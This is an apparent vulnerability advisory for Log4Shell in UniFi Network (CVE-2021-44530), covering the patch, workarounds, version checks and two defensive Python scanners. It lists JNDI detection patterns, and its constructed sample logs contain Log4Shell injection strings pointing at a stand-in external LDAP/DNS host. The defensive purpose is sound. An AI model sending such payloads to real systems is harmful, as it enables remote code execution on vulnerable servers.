CVE-2021-44530

9.8 CRITICAL

📋 TL;DR

This is the Log4Shell vulnerability (CVE-2021-44228) affecting UniFi Network software. It allows remote code execution via JNDI injection in Log4j, enabling attackers to take full control of affected systems. Organizations running UniFi Network Version 6.5.53 or earlier are vulnerable.

💻 Affected Systems

Products:
  • UniFi Network Application
Versions: Version 6.5.53 and earlier
Operating Systems: All platforms running UniFi Network
Default Config Vulnerable: ⚠️ Yes
Notes: Affects all default installations using vulnerable Log4j versions. UniFi Network runs on various platforms including Windows, Linux, and macOS.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete system compromise allowing attackers to install malware, steal data, pivot to other systems, and maintain persistent access.

🟠 Likely Case: Remote code execution leading to cryptocurrency mining, ransomware deployment, or data exfiltration.

🟢 If Mitigated: Limited impact with proper network segmentation, egress filtering, and security controls preventing successful exploitation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Widely exploited in the wild with numerous public proof-of-concept exploits available. Attack requires no authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Version 6.5.54 and later

Vendor Advisory: https://community.ui.com/releases/Security-Advisory-Bulletin-023-023/808a1db0-5f8e-4b91-9097-9822f3f90207

Restart Required: Yes

Instructions:

1. Download UniFi Network Version 6.5.54 or later from UI.com.
2. Stop the UniFi Network service.
3. Install the updated version.
4. Restart the service.

🔧 Temporary Workarounds

Log4j JVM Parameter Mitigation

Platform: all

Set the Log4j system property that disables message lookups, so `${jndi:...}` patterns in logged messages are no longer resolved:

-Dlog4j2.formatMsgNoLookups=true

Add this to the JVM startup parameters of the UniFi Network service and restart it. Note that this property only exists in Log4j 2.10 and later and was later shown to be an incomplete mitigation; treat it as a stopgap until the patched version is installed.

Remove JndiLookup Class

Platform: linux

Remove the vulnerable lookup class from every Log4j jar in the installation (the service must be restarted afterwards so the running JVM no longer has the class loaded):

find /usr/lib/unifi -name "*log4j*.jar" -exec zip -q -d {} org/apache/logging/log4j/core/lookup/JndiLookup.class \;

🧯 If You Can't Patch

  • Block outbound LDAP and RMI traffic from UniFi systems at network perimeter
  • Implement strict network segmentation to isolate UniFi systems from critical assets

🔍 How to Verify

Check if Vulnerable:

Check the UniFi Network version in the web interface, or read the bundled Log4j version from the jar manifest on the controller host:

unzip -p /usr/lib/unifi/lib/log4j-core-*.jar META-INF/MANIFEST.MF | grep -i implementation-version

Check Version:

grep -i version /usr/lib/unifi/system.properties 2>/dev/null

If that file does not report a version, check the web interface.

Verify Fix Applied:

Verify version is 6.5.54 or later in UniFi web interface under Settings > System
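The version check above tells you whether the UniFi patch is installed, but it does not tell you whether the "Remove JndiLookup Class" workaround actually took effect on every bundled jar. The script below is an added example (not from the advisory or from Ubiquiti) that walks an installation directory, opens each `*log4j*.jar`, reads the `Implementation-Version` from its manifest and reports whether `JndiLookup.class` is still present. The directory layout, jar names and version strings in `demo()` are constructed for the example; on a real host you would call `scan_tree("/usr/lib/unifi")` instead.

```python
import os
import shutil
import tempfile
import zipfile

# The class the workaround deletes from each Log4j jar.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def inspect_jar(path):
    """Return (implementation_version_or_None, jndi_lookup_present) for one jar."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            for line in manifest.splitlines():
                # Log4j jars carry their release in Implementation-Version.
                if line.startswith("Implementation-Version:"):
                    version = line.split(":", 1)[1].strip()
                    break
        return version, JNDI_LOOKUP in names


def scan_tree(root):
    """Inspect every *log4j*.jar under root; return findings sorted by jar name."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if "log4j" in name.lower() and name.endswith(".jar"):
                version, present = inspect_jar(os.path.join(dirpath, name))
                findings.append({
                    "jar": name,
                    "version": version,
                    "jndi_lookup_present": present,
                })
    return sorted(findings, key=lambda f: f["jar"])


def _make_jar(path, version, include_jndi_lookup):
    """Build a constructed jar with a manifest and a dummy class entry."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        zf.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class",
                    b"\xca\xfe\xba\xbe")  # class-file magic only, not real bytecode
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")


def demo():
    """Constructed installation: one unpatched core jar, one with the class removed,
    and an api jar that never contained the class."""
    root = tempfile.mkdtemp(prefix="unifi-lib-")
    try:
        lib = os.path.join(root, "lib")
        os.makedirs(lib)
        _make_jar(os.path.join(lib, "log4j-core-unpatched-constructed.jar"),
                  "0.0-constructed", True)
        _make_jar(os.path.join(lib, "log4j-core-patched-constructed.jar"),
                  "0.0-constructed", False)
        _make_jar(os.path.join(lib, "log4j-api-constructed.jar"),
                  "0.0-constructed", False)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for f in demo():
        status = "JndiLookup PRESENT" if f["jndi_lookup_present"] else "clean"
        print(f"{f['jar']} ({f['version']}): {status}")
```

A jar still reporting `JndiLookup PRESENT` after the workaround means the `zip -d` step missed it (for example because the jar sits outside the searched directory); a clean result across all jars plus a version of 6.5.54 or later is what you want to see before closing the ticket.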

📡 Detection & Monitoring

Log Indicators (in application logs):

  • ${jndi:ldap://
  • ${jndi:rmi://
  • ${jndi:dns://

Network Indicators:

  • Outbound LDAP/RMI connections from UniFi systems to unknown external IPs

SIEM Query:

source="unifi" AND "${jndi:"
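For teams without a SIEM query path, the following added example (not part of the advisory) applies the same log and network indicators listed above offline: it scans application log lines for `${jndi:` lookups and records the scheme, and it flags outbound connections from the controller to LDAP or RMI ports. The log lines, connection records, the controller address `10.0.0.5` and the port-to-protocol table are all constructed assumptions for the example.

```python
import re

# Log indicator from the advisory: any ${jndi:<scheme>:// lookup string.
# Matched case-insensitively so casing differences in the input do not matter.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://", re.IGNORECASE)

# Network indicator: outbound LDAP/RMI from UniFi hosts. The port mapping is an
# assumption (standard LDAP, LDAPS and RMI registry ports), not from the advisory.
WATCHED_PORTS = {389: "ldap", 636: "ldaps", 1099: "rmi"}
UNIFI_HOSTS = {"10.0.0.5"}  # constructed: address of the UniFi Network controller


def find_log_indicators(lines):
    """Return one record per ${jndi:...} match, with its line number and scheme."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in JNDI_RE.finditer(line):
            hits.append({"line": n, "scheme": m.group("scheme").lower(),
                         "match": m.group(0)})
    return hits


def find_outbound_jndi_connections(conns):
    """conns: iterable of (src_ip, dst_ip, dst_port). Flag controller -> LDAP/RMI."""
    flagged = []
    for src, dst, port in conns:
        if src in UNIFI_HOSTS and port in WATCHED_PORTS:
            flagged.append({"src": src, "dst": dst, "port": port,
                            "proto": WATCHED_PORTS[port]})
    return flagged


# Constructed sample: two access-log lines and one application-log line.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /manage/account/login HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:02:14 +0000] "GET /manage/account/login HTTP/1.1" 200 1523 "-" "${jndi:ldap://203.0.113.9/a}"',
    '[2021-12-10 14:02:15,004] WARN  system - Failed login for user ${jndi:dns://203.0.113.9/x}',
]

# Constructed sample: (src, dst, dst_port) records as a flow export would give them.
SAMPLE_CONNS = [
    ("10.0.0.5", "10.0.0.2", 443),       # controller to internal HTTPS: benign
    ("10.0.0.5", "203.0.113.9", 389),    # controller to external LDAP: flagged
    ("10.0.0.8", "203.0.113.9", 389),    # some other host: outside scope here
]


if __name__ == "__main__":
    for h in find_log_indicators(SAMPLE_LOG):
        print(f"log line {h['line']}: {h['scheme']} lookup {h['match']}")
    for c in find_outbound_jndi_connections(SAMPLE_CONNS):
        print(f"outbound {c['proto']} from {c['src']} to {c['dst']}:{c['port']}")
```

A log hit alone shows that a payload was received; pairing it with a flagged outbound LDAP or RMI connection in the same time window is what separates a blocked attempt from one that reached the lookup stage and warrants incident response.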
